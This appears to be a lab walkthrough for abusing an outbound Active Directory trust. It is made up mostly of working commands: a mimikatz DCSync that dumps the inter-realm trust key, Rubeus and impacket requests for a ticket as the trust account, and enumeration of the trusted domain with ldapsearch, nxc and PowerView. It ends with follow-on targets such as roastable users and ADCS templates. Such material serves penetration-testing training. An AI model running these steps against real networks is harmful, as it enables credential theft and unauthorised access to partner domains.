Outbound trust abuse starts when we are on the wrong side of a one-way trust. Our domain trusts the other domain, but that does not automatically let us enumerate or access the other domain. The useful path is the inter-realm trust key stored in the trusted domain object.
Confirm outbound direction
ldapsearch -LLL -x -H ldap://10.10.10.200 -D 'ootw.local\student' -w 'student' -b 'DC=ootw,DC=local' '(objectClass=trustedDomain)' name trustPartner trustDirection trustAttributes flatName objectGUID
Expected direction
trustDirection: 2
Attempting foreign enumeration without usable trusted-domain credentials usually fails.
ldapsearch -LLL -x -H ldap://trusted-dc.trusted.local -D 'ootw.local\student' -w 'student' -b 'DC=trusted,DC=local' '(objectClass=domain)' name
Dump TDO trust key by GUID
mimikatz.exe "lsadump::dcsync /domain:ootw.local /guid:{288d9ee6-2b3c-42aa-bef8-959ab4e484ed}" "exit"
Request TGT as the trust account from Windows
Rubeus.exe asktgt /user:OOTW$ /domain:trusted.local /dc:trusted-dc.trusted.local /rc4:<OUT_RC4> /ptt
klist
Request TGT as the trust account from Linux
getTGT.py trusted.local/'OOTW$' -hashes :<OUT_RC4> -dc-ip <TRUSTED_DC>
export KRB5CCNAME='OOTW$.ccache'
klist
Enumerate the trusted domain with the trust account
ldapsearch -Y GSSAPI -H ldap://trusted-dc.trusted.local -b 'DC=trusted,DC=local' '(objectClass=domain)' name objectSid
ldapsearch -Y GSSAPI -H ldap://trusted-dc.trusted.local -b 'DC=trusted,DC=local' '(servicePrincipalName=*)' sAMAccountName servicePrincipalName
nxc ldap trusted-dc.trusted.local -d trusted.local -u 'OOTW$' -k --use-kcache
Windows enumeration after ticket injection
Get-DomainTrust -Domain trusted.local
Get-DomainUser -Domain trusted.local
Get-DomainComputer -Domain trusted.local
Next targets
Roastable users
ADCS templates and enrollment services
Delegation paths
Foreign security principal memberships
Weak shares and exposed GPO data
Notes
The trust account normally has basic domain-user style visibility in the trusted domain because its primary group is effectively Domain Users. That usually gives enumeration, not immediate administrative access.
The current and previous trust keys may both work if the trust password rotation window overlaps. In Mimikatz output these often appear as [Out] and [Out-1].